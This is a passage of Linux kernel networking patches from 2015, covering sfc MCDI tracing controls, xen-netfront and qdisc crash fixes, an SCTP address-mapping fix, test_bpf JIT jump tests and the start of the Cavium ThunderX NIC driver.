0; i < hdr_len / 4 && bytes < PAGE_SIZE; i++) + bytes += snprintf(buf + bytes, PAGE_SIZE - bytes, + " %08x", le32_to_cpu(hdr[i].u32[0])); + + for (i = 0; i < inlen / 4 && bytes < PAGE_SIZE; i++) + bytes += snprintf(buf + bytes, PAGE_SIZE - bytes, + " %08x", le32_to_cpu(inbuf[i].u32[0])); + + netif_info(efx, hw, efx->net_dev, "MCDI RPC REQ:%s\n", buf); + } +#endif + efx->type->mcdi_request(efx, hdr, hdr_len, inbuf, inlen); mcdi->new_epoch = false; @@ -206,6 +253,9 @@ static void efx_mcdi_read_response_header(struct efx_nic *efx) { struct efx_mcdi_iface *mcdi = efx_mcdi(efx); unsigned int respseq, respcmd, error; +#ifdef CONFIG_SFC_MCDI_LOGGING + char *buf = mcdi->logging_buffer; /* page-sized */ +#endif efx_dword_t hdr; efx->type->mcdi_read_response(efx, &hdr, 0, 4); @@ -223,6 +273,39 @@ static void efx_mcdi_read_response_header(struct efx_nic *efx) EFX_DWORD_FIELD(hdr, MC_CMD_V2_EXTN_IN_ACTUAL_LEN); } +#ifdef CONFIG_SFC_MCDI_LOGGING + if (!WARN_ON_ONCE(!buf)) { + size_t hdr_len, data_len; + int bytes = 0; + int i; + + WARN_ON_ONCE(mcdi->resp_hdr_len % 4); + hdr_len = mcdi->resp_hdr_len / 4; + /* MCDI_DECLARE_BUF ensures that underlying buffer is padded + * to dword size, and the MCDI buffer is always dword size + */ + data_len = DIV_ROUND_UP(mcdi->resp_data_len, 4); + + /* We own the logging buffer, as only one MCDI can be in + * progress on a NIC at any one time. So no need for locking. + */ + for (i = 0; i < hdr_len && bytes < PAGE_SIZE; i++) { + efx->type->mcdi_read_response(efx, &hdr, (i * 4), 4); + bytes += snprintf(buf + bytes, PAGE_SIZE - bytes, + " %08x", le32_to_cpu(hdr.u32[0])); + } + + for (i = 0; i < data_len && bytes < PAGE_SIZE; i++) { + efx->type->mcdi_read_response(efx, &hdr, + mcdi->resp_hdr_len + (i * 4), 4); + bytes += snprintf(buf + bytes, PAGE_SIZE - bytes, + " %08x", le32_to_cpu(hdr.u32[0])); + } + + netif_info(efx, hw, efx->net_dev, "MCDI RPC RESP:%s\n", buf); + } +#endif + if (error && mcdi->resp_data_len == 0) { netif_err(efx, hw, efx->net_dev, "MC rebooted\n"); mcdi->resprc = -EIO; diff --git a/drivers/net/ethernet/sfc/mcdi.h b/drivers/net/ethernet/sfc/mcdi.h index 7afab2fff4fe..b783a2dff80f 100644 --- a/drivers/net/ethernet/sfc/mcdi.h +++ b/drivers/net/ethernet/sfc/mcdi.h @@ -58,6 +58,7 @@ enum efx_mcdi_mode { * enabled * @async_list: Queue of asynchronous requests * @async_timer: Timer for asynchronous request timeout + * @logging_buffer: buffer that may be used to build MCDI tracing messages */ struct efx_mcdi_iface { struct efx_nic *efx; @@ -74,6 +75,9 @@ struct efx_mcdi_iface { spinlock_t async_lock; struct list_head async_list; struct timer_list async_timer; +#ifdef CONFIG_SFC_MCDI_LOGGING + char *logging_buffer; +#endif }; struct efx_mcdi_mon { From e7fef9b45ae188066bb6eb3dde8310d33c2f7d5e Mon Sep 17 00:00:00 2001 From: Edward Cree Date: Wed, 27 May 2015 13:14:01 +0100 Subject: [PATCH 311/872] sfc: add sysfs entry to control MCDI tracing MCDI tracing is enabled per-function with a sysfs file /sys/class/net//device/mcdi_logging Signed-off-by: Edward Cree Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/Kconfig | 3 +- drivers/net/ethernet/sfc/efx.c | 49 +++++++++++++++++++++++++++----- drivers/net/ethernet/sfc/mcdi.c | 4 +-- drivers/net/ethernet/sfc/mcdi.h | 2 ++ 4 files changed, 48 insertions(+), 10 deletions(-) diff --git a/drivers/net/ethernet/sfc/Kconfig b/drivers/net/ethernet/sfc/Kconfig index c4ba42b1923f..4dd92b7b80f4 100644 --- a/drivers/net/ethernet/sfc/Kconfig +++ b/drivers/net/ethernet/sfc/Kconfig @@ -43,4 +43,5 @@ config SFC_MCDI_LOGGING ---help--- This enables support for tracing of MCDI (Management-Controller-to- Driver-Interface) commands and responses, allowing debugging of - driver/firmware interaction. + driver/firmware interaction. The tracing is actually enabled by + a sysfs file 'mcdi_logging' under the PCI device. diff --git a/drivers/net/ethernet/sfc/efx.c b/drivers/net/ethernet/sfc/efx.c index 9eafa39d0e7f..2d4853c032c3 100644 --- a/drivers/net/ethernet/sfc/efx.c +++ b/drivers/net/ethernet/sfc/efx.c @@ -2326,6 +2326,28 @@ show_phy_type(struct device *dev, struct device_attribute *attr, char *buf) } static DEVICE_ATTR(phy_type, 0444, show_phy_type, NULL); +#ifdef CONFIG_SFC_MCDI_LOGGING +static ssize_t show_mcdi_log(struct device *dev, struct device_attribute *attr, + char *buf) +{ + struct efx_nic *efx = pci_get_drvdata(to_pci_dev(dev)); + struct efx_mcdi_iface *mcdi = efx_mcdi(efx); + + return scnprintf(buf, PAGE_SIZE, "%d\n", mcdi->logging_enabled); +} +static ssize_t set_mcdi_log(struct device *dev, struct device_attribute *attr, + const char *buf, size_t count) +{ + struct efx_nic *efx = pci_get_drvdata(to_pci_dev(dev)); + struct efx_mcdi_iface *mcdi = efx_mcdi(efx); + bool enable = count > 0 && *buf != '0'; + + mcdi->logging_enabled = enable; + return count; +} +static DEVICE_ATTR(mcdi_logging, 0644, show_mcdi_log, set_mcdi_log); +#endif + static int efx_register_netdev(struct efx_nic *efx) { struct net_device *net_dev = efx->net_dev; @@ -2383,9 +2405,21 @@ static int efx_register_netdev(struct efx_nic *efx) "failed to init net dev attributes\n"); goto fail_registered; } +#ifdef CONFIG_SFC_MCDI_LOGGING + rc = device_create_file(&efx->pci_dev->dev, &dev_attr_mcdi_logging); + if (rc) { + netif_err(efx, drv, efx->net_dev, + "failed to init net dev attributes\n"); + goto fail_attr_mcdi_logging; + } +#endif return 0; +#ifdef CONFIG_SFC_MCDI_LOGGING +fail_attr_mcdi_logging: + device_remove_file(&efx->pci_dev->dev, &dev_attr_phy_type); +#endif fail_registered: rtnl_lock(); efx_dissociate(efx); @@ -2404,13 +2438,14 @@ static void efx_unregister_netdev(struct efx_nic *efx) BUG_ON(netdev_priv(efx->net_dev) != efx); - strlcpy(efx->name, pci_name(efx->pci_dev), sizeof(efx->name)); - device_remove_file(&efx->pci_dev->dev, &dev_attr_phy_type); - - rtnl_lock(); - unregister_netdevice(efx->net_dev); - efx->state = STATE_UNINIT; - rtnl_unlock(); + if (efx_dev_registered(efx)) { + strlcpy(efx->name, pci_name(efx->pci_dev), sizeof(efx->name)); +#ifdef CONFIG_SFC_MCDI_LOGGING + device_remove_file(&efx->pci_dev->dev, &dev_attr_mcdi_logging); +#endif + device_remove_file(&efx->pci_dev->dev, &dev_attr_phy_type); + unregister_netdev(efx->net_dev); + } } /************************************************************************** diff --git a/drivers/net/ethernet/sfc/mcdi.c b/drivers/net/ethernet/sfc/mcdi.c index 31eda3255966..dde7f901e16c 100644 --- a/drivers/net/ethernet/sfc/mcdi.c +++ b/drivers/net/ethernet/sfc/mcdi.c @@ -188,7 +188,7 @@ static void efx_mcdi_send_request(struct efx_nic *efx, unsigned cmd, } #ifdef CONFIG_SFC_MCDI_LOGGING - if (!WARN_ON_ONCE(!buf)) { + if (mcdi->logging_enabled && !WARN_ON_ONCE(!buf)) { int bytes = 0; int i; /* Lengths should always be a whole number of dwords, so scream @@ -274,7 +274,7 @@ static void efx_mcdi_read_response_header(struct efx_nic *efx) } #ifdef CONFIG_SFC_MCDI_LOGGING - if (!WARN_ON_ONCE(!buf)) { + if (mcdi->logging_enabled && !WARN_ON_ONCE(!buf)) { size_t hdr_len, data_len; int bytes = 0; int i; diff --git a/drivers/net/ethernet/sfc/mcdi.h b/drivers/net/ethernet/sfc/mcdi.h index b783a2dff80f..1838afe2da92 100644 --- a/drivers/net/ethernet/sfc/mcdi.h +++ b/drivers/net/ethernet/sfc/mcdi.h @@ -59,6 +59,7 @@ enum efx_mcdi_mode { * @async_list: Queue of asynchronous requests * @async_timer: Timer for asynchronous request timeout * @logging_buffer: buffer that may be used to build MCDI tracing messages + * @logging_enabled: whether to trace MCDI */ struct efx_mcdi_iface { struct efx_nic *efx; @@ -77,6 +78,7 @@ struct efx_mcdi_iface { struct timer_list async_timer; #ifdef CONFIG_SFC_MCDI_LOGGING char *logging_buffer; + bool logging_enabled; #endif }; From 42ca087fbfe4a961cd7ff09bbc31b3e17eabc06b Mon Sep 17 00:00:00 2001 From: Edward Cree Date: Wed, 27 May 2015 13:14:26 +0100 Subject: [PATCH 312/872] sfc: add module parameter to enable MCDI logging on new functions As many issues are encountered at probe time, where MCDI logging can't be enabled through the sysfs node, this change adds a module parameter 'mcdi_logging_default', which defaults to false. When set to true, newly- probed functions will have MCDI logging enabled. The setting can subsequently be changed as normal through the sysfs node. Signed-off-by: Edward Cree Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/mcdi.c | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/drivers/net/ethernet/sfc/mcdi.c b/drivers/net/ethernet/sfc/mcdi.c index dde7f901e16c..81640f8bb811 100644 --- a/drivers/net/ethernet/sfc/mcdi.c +++ b/drivers/net/ethernet/sfc/mcdi.c @@ -8,6 +8,7 @@ */ #include +#include #include #include "net_driver.h" #include "nic.h" @@ -54,6 +55,13 @@ static int efx_mcdi_drv_attach(struct efx_nic *efx, bool driver_operating, static bool efx_mcdi_poll_once(struct efx_nic *efx); static void efx_mcdi_abandon(struct efx_nic *efx); +#ifdef CONFIG_SFC_MCDI_LOGGING +static bool mcdi_logging_default; +module_param(mcdi_logging_default, bool, 0644); +MODULE_PARM_DESC(mcdi_logging_default, + "Enable MCDI logging on newly-probed functions"); +#endif + int efx_mcdi_init(struct efx_nic *efx) { struct efx_mcdi_iface *mcdi; @@ -71,6 +79,7 @@ int efx_mcdi_init(struct efx_nic *efx) mcdi->logging_buffer = (char *)__get_free_page(GFP_KERNEL); if (!mcdi->logging_buffer) goto fail1; + mcdi->logging_enabled = mcdi_logging_default; #endif init_waitqueue_head(&mcdi->wq); spin_lock_init(&mcdi->iface_lock); From ad0681185770716523c81b156c44b9804d7b8ed2 Mon Sep 17 00:00:00 2001 From: David Vrabel Date: Wed, 27 May 2015 15:46:10 +0100 Subject: [PATCH 313/872] xen-netfront: properly destroy queues when removing device xennet_remove() freed the queues before freeing the netdevice which results in a use-after-free when free_netdev() tries to delete the napi instances that have already been freed. Fix this by fully destroy the queues (which includes deleting the napi instances) before freeing the netdevice. Signed-off-by: David Vrabel Reviewed-by: Boris Ostrovsky Signed-off-by: David S. Miller --- drivers/net/xen-netfront.c | 15 ++------------- 1 file changed, 2 insertions(+), 13 deletions(-) diff --git a/drivers/net/xen-netfront.c b/drivers/net/xen-netfront.c index 3f45afd4382e..e031c943286e 100644 --- a/drivers/net/xen-netfront.c +++ b/drivers/net/xen-netfront.c @@ -1698,6 +1698,7 @@ static void xennet_destroy_queues(struct netfront_info *info) if (netif_running(info->netdev)) napi_disable(&queue->napi); + del_timer_sync(&queue->rx_refill_timer); netif_napi_del(&queue->napi); } @@ -2102,9 +2103,6 @@ static const struct attribute_group xennet_dev_group = { static int xennet_remove(struct xenbus_device *dev) { struct netfront_info *info = dev_get_drvdata(&dev->dev); - unsigned int num_queues = info->netdev->real_num_tx_queues; - struct netfront_queue *queue = NULL; - unsigned int i = 0; dev_dbg(&dev->dev, "%s\n", dev->nodename); @@ -2112,16 +2110,7 @@ static int xennet_remove(struct xenbus_device *dev) unregister_netdev(info->netdev); - for (i = 0; i < num_queues; ++i) { - queue = &info->queues[i]; - del_timer_sync(&queue->rx_refill_timer); - } - - if (num_queues) { - kfree(info->queues); - info->queues = NULL; - } - + xennet_destroy_queues(info); xennet_free_netdev(info->netdev); return 0; From bde28bc6ad0c575f8b4eebe8cd27e36d6c3b09c6 Mon Sep 17 00:00:00 2001 From: Daniel Borkmann Date: Tue, 26 May 2015 22:35:43 +0200 Subject: [PATCH 314/872] test_bpf: add similarly conflicting jump test case only for classic While 3b52960266a3 ("test_bpf: add more eBPF jump torture cases") added the int3 bug test case only for eBPF, which needs exactly 11 passes to converge, here's a version for classic BPF with 11 passes, and one that would need 70 passes on x86_64 to actually converge for being successfully JITed. Effectively, all jumps are being optimized out resulting in a JIT image of just 89 bytes (from originally max BPF insns), only returning K. Might be useful as a receipe for folks wanting to craft a test case when backporting the fix in commit 3f7352bf21f8 ("x86: bpf_jit: fix compilation of large bpf programs") while not having eBPF. The 2nd one is delegated to the interpreter as the last pass still results in shrinking, in other words, this one won't be JITed on x86_64. Signed-off-by: Daniel Borkmann Acked-by: Alexei Starovoitov Signed-off-by: David S. Miller --- lib/test_bpf.c | 57 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) diff --git a/lib/test_bpf.c b/lib/test_bpf.c index c07b8e7db330..7f58c735d745 100644 --- a/lib/test_bpf.c +++ b/lib/test_bpf.c @@ -314,6 +314,47 @@ static int bpf_fill_maxinsns10(struct bpf_test *self) return 0; } +static int __bpf_fill_ja(struct bpf_test *self, unsigned int len, + unsigned int plen) +{ + struct sock_filter *insn; + unsigned int rlen; + int i, j; + + insn = kmalloc_array(len, sizeof(*insn), GFP_KERNEL); + if (!insn) + return -ENOMEM; + + rlen = (len % plen) - 1; + + for (i = 0; i + plen < len; i += plen) + for (j = 0; j < plen; j++) + insn[i + j] = __BPF_JUMP(BPF_JMP | BPF_JA, + plen - 1 - j, 0, 0); + for (j = 0; j < rlen; j++) + insn[i + j] = __BPF_JUMP(BPF_JMP | BPF_JA, rlen - 1 - j, + 0, 0); + + insn[len - 1] = __BPF_STMT(BPF_RET | BPF_K, 0xababcbac); + + self->u.ptr.insns = insn; + self->u.ptr.len = len; + + return 0; +} + +static int bpf_fill_maxinsns11(struct bpf_test *self) +{ + /* Hits 70 passes on x86_64, so cannot get JITed there. */ + return __bpf_fill_ja(self, BPF_MAXINSNS, 68); +} + +static int bpf_fill_ja(struct bpf_test *self) +{ + /* Hits exactly 11 passes on x86_64 JIT. */ + return __bpf_fill_ja(self, 12, 9); +} + static struct bpf_test tests[] = { { "TAX", @@ -4252,6 +4293,14 @@ static struct bpf_test tests[] = { { }, { { 0, 1 } }, }, + { + "JMP_JA: Jump, gap, jump, ...", + { }, + CLASSIC | FLAG_NO_DATA, + { }, + { { 0, 0xababcbac } }, + .fill_helper = bpf_fill_ja, + }, { /* Mainly checking JIT here. */ "BPF_MAXINSNS: Maximum possible literals", { }, @@ -4335,6 +4384,14 @@ static struct bpf_test tests[] = { { { 0, 0xabababac } }, .fill_helper = bpf_fill_maxinsns10, }, + { + "BPF_MAXINSNS: Jump, gap, jump, ...", + { }, + CLASSIC | FLAG_NO_DATA, + { }, + { { 0, 0xababcbac } }, + .fill_helper = bpf_fill_maxinsns11, + }, }; static struct net_device dev; From 86e363dc3b50bfd50a1f315934583fbda673ab8d Mon Sep 17 00:00:00 2001 From: WANG Cong Date: Tue, 26 May 2015 16:08:48 -0700 Subject: [PATCH 315/872] net_sched: invoke ->attach() after setting dev->qdisc For mq qdisc, we add per tx queue qdisc to root qdisc for display purpose, however, that happens too early, before the new dev->qdisc is finally set, this causes q->list points to an old root qdisc which is going to be freed right before assigning with a new one. Fix this by moving ->attach() after setting dev->qdisc. For the record, this fixes the following crash: ------------[ cut here ]------------ WARNING: CPU: 1 PID: 975 at lib/list_debug.c:59 __list_del_entry+0x5a/0x98() list_del corruption. prev->next should be ffff8800d1998ae8, but was 6b6b6b6b6b6b6b6b CPU: 1 PID: 975 Comm: tc Not tainted 4.1.0-rc4+ #1019 Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 0000000000000009 ffff8800d73fb928 ffffffff81a44e7f 0000000047574756 ffff8800d73fb978 ffff8800d73fb968 ffffffff810790da ffff8800cfc4cd20 ffffffff814e725b ffff8800d1998ae8 ffffffff82381250 0000000000000000 Call Trace: [] dump_stack+0x4c/0x65 [] warn_slowpath_common+0x9c/0xb6 [] ? __list_del_entry+0x5a/0x98 [] warn_slowpath_fmt+0x46/0x48 [] ? dev_graft_qdisc+0x5e/0x6a [] __list_del_entry+0x5a/0x98 [] list_del+0xe/0x2d [] qdisc_list_del+0x1e/0x20 [] qdisc_destroy+0x30/0xd6 [] qdisc_graft+0x11d/0x243 [] tc_get_qdisc+0x1a6/0x1d4 [] ? mark_lock+0x2e/0x226 [] rtnetlink_rcv_msg+0x181/0x194 [] ? rtnl_lock+0x17/0x19 [] ? rtnl_lock+0x17/0x19 [] ? __rtnl_unlock+0x17/0x17 [] netlink_rcv_skb+0x4d/0x93 [] rtnetlink_rcv+0x26/0x2d [] netlink_unicast+0xcb/0x150 [] ? might_fault+0x59/0xa9 [] netlink_sendmsg+0x4fa/0x51c [] sock_sendmsg_nosec+0x12/0x1d [] sock_sendmsg+0x29/0x2e [] ___sys_sendmsg+0x1b4/0x23a [] ? native_sched_clock+0x35/0x37 [] ? sched_clock_local+0x12/0x72 [] ? sched_clock_cpu+0x9e/0xb7 [] ? current_kernel_time+0xe/0x32 [] ? lock_release_holdtime.part.29+0x71/0x7f [] ? read_seqcount_begin.constprop.27+0x5f/0x76 [] ? trace_hardirqs_on_caller+0x17d/0x199 [] ? __fget_light+0x50/0x78 [] __sys_sendmsg+0x42/0x60 [] SyS_sendmsg+0x12/0x1c [] system_call_fastpath+0x12/0x6f ---[ end trace ef29d3fb28e97ae7 ]--- For long term, we probably need to clean up the qdisc_graft() code in case it hides other bugs like this. Fixes: 95dc19299f74 ("pkt_sched: give visibility to mq slave qdiscs") Cc: Jamal Hadi Salim Signed-off-by: Cong Wang Acked-by: Eric Dumazet Signed-off-by: David S. Miller --- net/sched/sch_api.c | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c index ad9eed70bc8f..1e1c89e51a11 100644 --- a/net/sched/sch_api.c +++ b/net/sched/sch_api.c @@ -815,10 +815,8 @@ static int qdisc_graft(struct net_device *dev, struct Qdisc *parent, if (dev->flags & IFF_UP) dev_deactivate(dev); - if (new && new->ops->attach) { - new->ops->attach(new); - num_q = 0; - } + if (new && new->ops->attach) + goto skip; for (i = 0; i < num_q; i++) { struct netdev_queue *dev_queue = dev_ingress_queue(dev); @@ -834,12 +832,16 @@ static int qdisc_graft(struct net_device *dev, struct Qdisc *parent, qdisc_destroy(old); } +skip: if (!ingress) { notify_and_destroy(net, skb, n, classid, dev->qdisc, new); if (new && !new->ops->attach) atomic_inc(&new->refcnt); dev->qdisc = new ? : &noop_qdisc; + + if (new && new->ops->attach) + new->ops->attach(new); } else { notify_and_destroy(net, skb, n, classid, old, new); } From 9302d7bb0c5cd46be5706859301f18c137b2439f Mon Sep 17 00:00:00 2001 From: Jason Gunthorpe Date: Tue, 26 May 2015 17:30:17 -0600 Subject: [PATCH 316/872] sctp: Fix mangled IPv4 addresses on a IPv6 listening socket sctp_v4_map_v6 was subtly writing and reading from members of a union in a way the clobbered data it needed to read before it read it. Zeroing the v6 flowinfo overwrites the v4 sin_addr with 0, meaning that every place that calls sctp_v4_map_v6 gets ::ffff:0.0.0.0 as the result. Reorder things to guarantee correct behaviour no matter what the union layout is. This impacts user space clients that open an IPv6 SCTP socket and receive IPv4 connections. Prior to 299ee user space would see a sockaddr with AF_INET and a correct address, after 299ee the sockaddr is AF_INET6, but the address is wrong. Fixes: 299ee123e198 (sctp: Fixup v4mapped behaviour to comply with Sock API) Signed-off-by: Jason Gunthorpe Acked-by: Daniel Borkmann Acked-by: Neil Horman Signed-off-by: David S. Miller --- include/net/sctp/sctp.h | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/include/net/sctp/sctp.h b/include/net/sctp/sctp.h index c56a438c3a1e..ce13cf20f625 100644 --- a/include/net/sctp/sctp.h +++ b/include/net/sctp/sctp.h @@ -574,11 +574,14 @@ static inline void sctp_v6_map_v4(union sctp_addr *addr) /* Map v4 address to v4-mapped v6 address */ static inline void sctp_v4_map_v6(union sctp_addr *addr) { + __be16 port; + + port = addr->v4.sin_port; + addr->v6.sin6_addr.s6_addr32[3] = addr->v4.sin_addr.s_addr; + addr->v6.sin6_port = port; addr->v6.sin6_family = AF_INET6; addr->v6.sin6_flowinfo = 0; addr->v6.sin6_scope_id = 0; - addr->v6.sin6_port = addr->v4.sin_port; - addr->v6.sin6_addr.s6_addr32[3] = addr->v4.sin_addr.s_addr; addr->v6.sin6_addr.s6_addr32[0] = 0; addr->v6.sin6_addr.s6_addr32[1] = 0; addr->v6.sin6_addr.s6_addr32[2] = htonl(0x0000ffff); From e5c4708b2b6fec0300db60ee3cf4b4ae96430a12 Mon Sep 17 00:00:00 2001 From: Sunil Goutham Date: Tue, 26 May 2015 19:20:14 -0700 Subject: [PATCH 317/872] pci: Add Cavium PCI vendor id This vendor id will be used by network (vNIC), USB (xHCI), SATA (AHCI), GPIO, I2C, MMC and maybe other drivers for ThunderX SoC. Acked-by: Bjorn Helgaas Signed-off-by: Sunil Goutham Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- include/linux/pci_ids.h | 2 ++ 1 file changed, 2 insertions(+) diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h index 2f7b9a40f627..2972c7f3aa1d 100644 --- a/include/linux/pci_ids.h +++ b/include/linux/pci_ids.h @@ -2329,6 +2329,8 @@ #define PCI_DEVICE_ID_ALTIMA_AC9100 0x03ea #define PCI_DEVICE_ID_ALTIMA_AC1003 0x03eb +#define PCI_VENDOR_ID_CAVIUM 0x177d + #define PCI_VENDOR_ID_BELKIN 0x1799 #define PCI_DEVICE_ID_BELKIN_F5D7010V7 0x701f From 4863dea3fab01734768c9f7fc2c1590a8f1f6266 Mon Sep 17 00:00:00 2001 From: Sunil Goutham Date: Tue, 26 May 2015 19:20:15 -0700 Subject: [PATCH 318/872] net: Adding support for Cavium ThunderX network controller This patch adds support for the Cavium ThunderX network controller. The driver is on the pci bus and thus requires the Thunder PCIe host controller driver to be enabled. Signed-off-by: Maciej Czekaj Signed-off-by: David Daney Signed-off-by: Sunil Goutham Signed-off-by: Ganapatrao Kulkarni Signed-off-by: Aleksey Makarov Signed-off-by: Tomasz Nowicki Signed-off-by: Robert Richter Signed-off-by: Kamil Rytarowski Signed-off-by: Thanneeru Srinivasulu Signed-off-by: Sruthi Vangala Signed-off-by: David S. Miller --- MAINTAINERS | 7 + drivers/net/ethernet/Kconfig | 1 + drivers/net/ethernet/Makefile | 1 + drivers/net/ethernet/cavium/Kconfig | 40 + drivers/net/ethernet/cavium/Makefile | 5 + drivers/net/ethernet/cavium/thunder/Makefile | 11 + drivers/net/ethernet/cavium/thunder/nic.h | 414 +++++ .../net/ethernet/cavium/thunder/nic_main.c | 940 ++++++++++ drivers/net/ethernet/cavium/thunder/nic_reg.h | 213 +++ .../ethernet/cavium/thunder/nicvf_ethtool.c | 601 +++++++ .../net/ethernet/cavium/thunder/nicvf_main.c | 1332 ++++++++++++++ .../ethernet/cavium/thunder/nicvf_queues.c | 1544 +++++++++++++++++ .../ethernet/cavium/thunder/nicvf_queues.h | 381 ++++ .../net/ethernet/cavium/thunder/q_struct.h | 701 ++++++++ .../net/ethernet/cavium/thunder/thunder_bgx.c | 966 +++++++++++ .../net/ethernet/cavium/thunder/thunder_bgx.h | 223 +++ 16 files changed, 7380 insertions(+) create mode 100644 drivers/net/ethernet/cavium/Kconfig create mode 100644 drivers/net/ethernet/cavium/Makefile create mode 100644 drivers/net/ethernet/cavium/thunder/Makefile create mode 100644 drivers/net/ethernet/cavium/thunder/nic.h create mode 100644 drivers/net/ethernet/cavium/thunder/nic_main.c create mode 100644 drivers/net/ethernet/cavium/thunder/nic_reg.h create mode 100644 drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c create mode 100644 drivers/net/ethernet/cavium/thunder/nicvf_main.c create mode 100644 drivers/net/ethernet/cavium/thunder/nicvf_queues.c create mode 100644 drivers/net/ethernet/cavium/thunder/nicvf_queues.h create mode 100644 drivers/net/ethernet/cavium/thunder/q_struct.h create mode 100644 drivers/net/ethernet/cavium/thunder/thunder_bgx.c create mode 100644 drivers/net/ethernet/cavium/thunder/thunder_bgx.h diff --git a/MAINTAINERS b/MAINTAINERS index df106f87a3ba..d1b1d2294b6a 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -921,6 +921,13 @@ M: Krzysztof Halasa S: Maintained F: arch/arm/mach-cns3xxx/ +ARM/CAVIUM THUNDER NETWORK DRIVER +M: Sunil Goutham +M: Robert Richter +L: linux-arm-kernel@lists.infradead.org (moderated for non-subscribers) +S: Supported +F: drivers/net/ethernet/cavium/ + ARM/CIRRUS LOGIC CLPS711X ARM ARCHITECTURE M: Alexander Shiyan L: linux-arm-kernel@lists.infradead.org (moderated for non-subscribers) diff --git a/drivers/net/ethernet/Kconfig b/drivers/net/ethernet/Kconfig index eadcb053807e..9a8308553520 100644 --- a/drivers/net/ethernet/Kconfig +++ b/drivers/net/ethernet/Kconfig @@ -34,6 +34,7 @@ source "drivers/net/ethernet/adi/Kconfig" source "drivers/net/ethernet/broadcom/Kconfig" source "drivers/net/ethernet/brocade/Kconfig" source "drivers/net/ethernet/calxeda/Kconfig" +source "drivers/net/ethernet/cavium/Kconfig" source "drivers/net/ethernet/chelsio/Kconfig" source "drivers/net/ethernet/cirrus/Kconfig" source "drivers/net/ethernet/cisco/Kconfig" diff --git a/drivers/net/ethernet/Makefile b/drivers/net/ethernet/Makefile index 1367afcd0a8b..4395d99115a0 100644 --- a/drivers/net/ethernet/Makefile +++ b/drivers/net/ethernet/Makefile @@ -20,6 +20,7 @@ obj-$(CONFIG_NET_BFIN) += adi/ obj-$(CONFIG_NET_VENDOR_BROADCOM) += broadcom/ obj-$(CONFIG_NET_VENDOR_BROCADE) += brocade/ obj-$(CONFIG_NET_CALXEDA_XGMAC) += calxeda/ +obj-$(CONFIG_NET_VENDOR_CAVIUM) += cavium/ obj-$(CONFIG_NET_VENDOR_CHELSIO) += chelsio/ obj-$(CONFIG_NET_VENDOR_CIRRUS) += cirrus/ obj-$(CONFIG_NET_VENDOR_CISCO) += cisco/ diff --git a/drivers/net/ethernet/cavium/Kconfig b/drivers/net/ethernet/cavium/Kconfig new file mode 100644 index 000000000000..6365fb4242be --- /dev/null +++ b/drivers/net/ethernet/cavium/Kconfig @@ -0,0 +1,40 @@ +# +# Cavium ethernet device configuration +# + +config NET_VENDOR_CAVIUM + tristate "Cavium ethernet drivers" + depends on PCI + ---help--- + Enable support for the Cavium ThunderX Network Interface + Controller (NIC). The NIC provides the controller and DMA + engines to move network traffic to/from the memory. The NIC + works closely with TNS, BGX and SerDes to implement the + functions replacing and virtualizing those of a typical + standalone PCIe NIC chip. + + If you have a Cavium Thunder board, say Y. + +if NET_VENDOR_CAVIUM + +config THUNDER_NIC_PF + tristate "Thunder Physical function driver" + default NET_VENDOR_CAVIUM + select THUNDER_NIC_BGX + ---help--- + This driver supports Thunder's NIC physical function. + +config THUNDER_NIC_VF + tristate "Thunder Virtual function driver" + default NET_VENDOR_CAVIUM + ---help--- + This driver supports Thunder's NIC virtual function + +config THUNDER_NIC_BGX + tristate "Thunder MAC interface driver (BGX)" + default NET_VENDOR_CAVIUM + ---help--- + This driver supports programming and controlling of MAC + interface from NIC physical function driver. + +endif # NET_VENDOR_CAVIUM diff --git a/drivers/net/ethernet/cavium/Makefile b/drivers/net/ethernet/cavium/Makefile new file mode 100644 index 000000000000..7aac4780d050 --- /dev/null +++ b/drivers/net/ethernet/cavium/Makefile @@ -0,0 +1,5 @@ +# +# Makefile for the Cavium ethernet device drivers. +# + +obj-$(CONFIG_NET_VENDOR_CAVIUM) += thunder/ diff --git a/drivers/net/ethernet/cavium/thunder/Makefile b/drivers/net/ethernet/cavium/thunder/Makefile new file mode 100644 index 000000000000..5c4615ccaa14 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/Makefile @@ -0,0 +1,11 @@ +# +# Makefile for Cavium's Thunder ethernet device +# + +obj-$(CONFIG_THUNDER_NIC_BGX) += thunder_bgx.o +obj-$(CONFIG_THUNDER_NIC_PF) += nicpf.o +obj-$(CONFIG_THUNDER_NIC_VF) += nicvf.o + +nicpf-y := nic_main.o +nicvf-y := nicvf_main.o nicvf_queues.o +nicvf-y += nicvf_ethtool.o diff --git a/drivers/net/ethernet/cavium/thunder/nic.h b/drivers/net/ethernet/cavium/thunder/nic.h new file mode 100644 index 000000000000..9b0be527909b --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nic.h @@ -0,0 +1,414 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#ifndef NIC_H +#define NIC_H + +#include +#include +#include "thunder_bgx.h" + +/* PCI device IDs */ +#define PCI_DEVICE_ID_THUNDER_NIC_PF 0xA01E +#define PCI_DEVICE_ID_THUNDER_PASS1_NIC_VF 0x0011 +#define PCI_DEVICE_ID_THUNDER_NIC_VF 0xA034 +#define PCI_DEVICE_ID_THUNDER_BGX 0xA026 + +/* PCI BAR nos */ +#define PCI_CFG_REG_BAR_NUM 0 +#define PCI_MSIX_REG_BAR_NUM 4 + +/* NIC SRIOV VF count */ +#define MAX_NUM_VFS_SUPPORTED 128 +#define DEFAULT_NUM_VF_ENABLED 8 + +#define NIC_TNS_BYPASS_MODE 0 +#define NIC_TNS_MODE 1 + +/* NIC priv flags */ +#define NIC_SRIOV_ENABLED BIT(0) + +/* Min/Max packet size */ +#define NIC_HW_MIN_FRS 64 +#define NIC_HW_MAX_FRS 9200 /* 9216 max packet including FCS */ + +/* Max pkinds */ +#define 